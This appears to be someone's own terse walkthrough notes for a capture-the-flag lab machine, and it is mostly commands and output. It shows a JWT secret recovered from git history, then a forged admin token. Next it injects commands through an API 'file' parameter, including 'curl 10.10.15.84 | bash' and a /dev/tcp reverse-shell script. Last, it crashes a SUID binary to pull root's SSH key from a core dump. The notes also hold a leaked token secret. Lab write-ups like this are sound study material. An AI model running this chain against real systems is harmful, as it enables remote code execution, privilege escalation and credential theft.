10.129.10.104
[
	::: firefox --> download -> files.zip
		::: unzip files.zip
		
			:: git log -p

				commit 67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
					Author: dasithsv <dasithsv@gmail.com>
					Date:   Fri Sep 3 11:30:17 2021 +0530

							removed .env for security reasons

					diff --git a/.env b/.env
					index fb6f587..31db370 100644
					--- a/.env
					+++ b/.env
					@@ -1,2 +1,2 @@
					 DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
					-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
					+TOKEN_SECRET = secret


	:::	firefox   http://10.129.6.92/docs#section-3  <<--- api use

			POST http://localhost:3000/api/user/register 

				{
					"name": "dasith",
					"email": "root@dasith.works",
					"password": "Kekc8swFgD6zU"
				}


				{
				"user": "dasith",
				}
		
		 POST http://localhost:3000/api/user/login 

			
				{
				"email": "root@dasith.works",
				"password": "Kekc8swFgD6zU"
				}

	::: curl
		register::
			curl -s -X POST http://$(mvnb):3000/api/user/register -H "Content-Type: application/json" -d '{"name": "test1234", "email": "test@test.com", "password": "test1234"}'

		login::
			curl -s -X POST http://$(mvnb):3000/api/user/login -H "Content-Type: application/json" -d '{"email": "test@test.com", "password": "test1234"}'

				eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2OTllMmE4YmIzOGQ2NDA0NzhhNGNhMjQiLCJuYW1lIjoidGVzdDEyMzQiLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE3NzE5NzcxNjd9.hTZcE-vwZk3BiW_Ld0A_k_czuSIBIsN8b9OWeo5KGII

	::: firefox   http://$(mvnb)/docs#section-5

	::: wfuzz  -c --hh=93 --hc=404 -t 300 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://$(mvnb)/api/FUZZ

			000002271:   401        0 L      2 W        13 Ch       "logs"
			000004146:   401        0 L      2 W        13 Ch       "priv"

	::: curl  -s -X GET http://$(mvnb):3000/api/priv -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2OTllMmE4YmIzOGQ2NDA0NzhhNGNhMjQiLCJuYW1lIjoidGVzdDEyMzQiLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE3NzE5NzcxNjd9.hTZcE-vwZk3BiW_Ld0A_k_czuSIBIsN8b9OWeo5KGII"

							{"role":{"role":"you are normal user","desc":"test1234"}}

	::: firefox  https://www.jwt.io/

			::  eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2OTllMmE4YmIzOGQ2NDA0NzhhNGNhMjQiLCJuYW1lIjoidGVzdDEyMzQiLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE3NzE5NzcxNjd9.hTZcE-vwZk3BiW_Ld0A_k_czuSIBIsN8b9OWeo5KGII

						{
							"_id": "699e2a8bb38d640478a4ca24",
							"name": "test1234",
							"email": "test@test.com",
							"iat": 1771977167
						}

			Encoder:: 
						{
							"_id": "699e2a8bb38d640478a4ca24",
							"name": "theadmin",									<<--- << "user theadmin"
							"email": "test@test.com",
							"iat": 1771977167
						}


	::: curl  -s -X GET http://$(mvnb):3000/api/priv -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2OTllMmE4YmIzOGQ2NDA0NzhhNGNhMjQiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE3NzE5NzcxNjd9.j6jkmCPoON18h-XwiNsbJMli1X0kGzkI5gbTc3-5ZPU" | jq

						{
							"creds": {
								"role": "admin",
								"username": "theadmin",
								"desc": "welcome back admin"
							}
						}

	::: curl  -s  -X GET http://$(mvnb):3000/api/logs -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2OTllMmE4YmIzOGQ2NDA0NzhhNGNhMjQiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE3NzE5NzcxNjd9.j6jkmCPoON18h-XwiNsbJMli1X0kGzkI5gbTc3-5ZPU" | jq

						{
							"killed": false,
							"code": 128,
							"signal": null,
							"cmd": "git log --oneline undefined"
						}

	::: vim ./local-web/routes/private.js

					router.get('/logs', verifytoken, (req, res) => {
							const file = req.query.file;										<<<< ---- <<<<  const file
							const userinfo = { name: req.user }
							const name = userinfo.name.name;
							
							if (name == 'theadmin'){
									const getLogs = `git log --oneline ${file}`;
									exec(getLogs, (err , output) =>{


	::: curl  -s.... -G http://$(mvnb):3000/api/logs -H ............ --data-urlencode "file=/etc/passwd;whoami" | jq

					"uid=1000(dasith) gid=1000(dasith) groups=1000(dasith)\n"

	::: nc -nlvp 1234

	::: vim index.html
					
						#!/bin/bash
						bach -c "bash -i >& /dev/tcp/ip_vpn/1234 0>&1"

	python3::: -m http.server 80

	curl::: -s -X GET -G http://$(mvnb):3000/api/logs -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2OTllMmE4YmIzOGQ2NDA0NzhhNGNhMjQiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdC5jb20iLCJpYXQiOjE3NzE5NzcxNjd9.j6jkmCPoON18h-XwiNsbJMli1X0kGzkI5gbTc3-5ZPU" --data-urlencode "file=/etc/passwd;curl 10.10.15.84 | bash" | jq

	{{{ ::: whoami  ==>  dasith

		::: find / -perm -4000 2>/dev/null | grep -vE "snap|lib"

						/opt/count

		::: /opt/count 

					Enter source file/directory name: /root/.ssh/id_rsa

		::: Ctrl-z

		::: ps

					PID TTY          TIME CMD
				 1907 pts/3    00:00:00 bash
				 1938 pts/3    00:00:00 count     <<<< ----
				 1944 pts/3    00:00:00 ps

		:::  kill -BUS 1938
		:::  fg
					./count
					Bus error (core dumped)
		
		::: ls -lah /var/crash

						-rw-r-----  1 root root  27K Oct  6  2021 _opt_count.0.crash
						-rw-r-----  1 root root  24K Oct  5  2021 _opt_countzz.0.crash

				dasith@secret:/var/crash$ ls -lah
					total 92K
					drwxrwxrwt  2 root   root   4.0K Feb 27 02:50 .
					drwxr-xr-x 14 root   root   4.0K Aug 13  2021 ..
					-rw-r-----  1 root   root    27K Oct  6  2021 _opt_count.0.crash
					-rw-r-----  1 dasith dasith  29K Feb 27 02:50 _opt_count.1000.crash
					-rw-r-----  1 root   root    24K Oct  5  2021 _opt_countzz.0.crash

		::: apport-unpack /var/crash/_opt_count.1000.crash  /tmp/id_rsa

		::: cd /tmp/id_rsa

		::: strings CoreDump | vim -					("quedate con el id_rsa, limpia, :w /tmp/id_rsa ")


	vpn::: vim:: w "paste id_rsa" | ! chmod 600 ./id_rsa
	vpn::: ssh -i ./id_rsa root@$(mvnb)

	ROOT:::.... <3 <3 <3

	}}}
]

{[
	:::
	 ::

	{{{
	:::

	ROOT:::...?
	}}}
]}
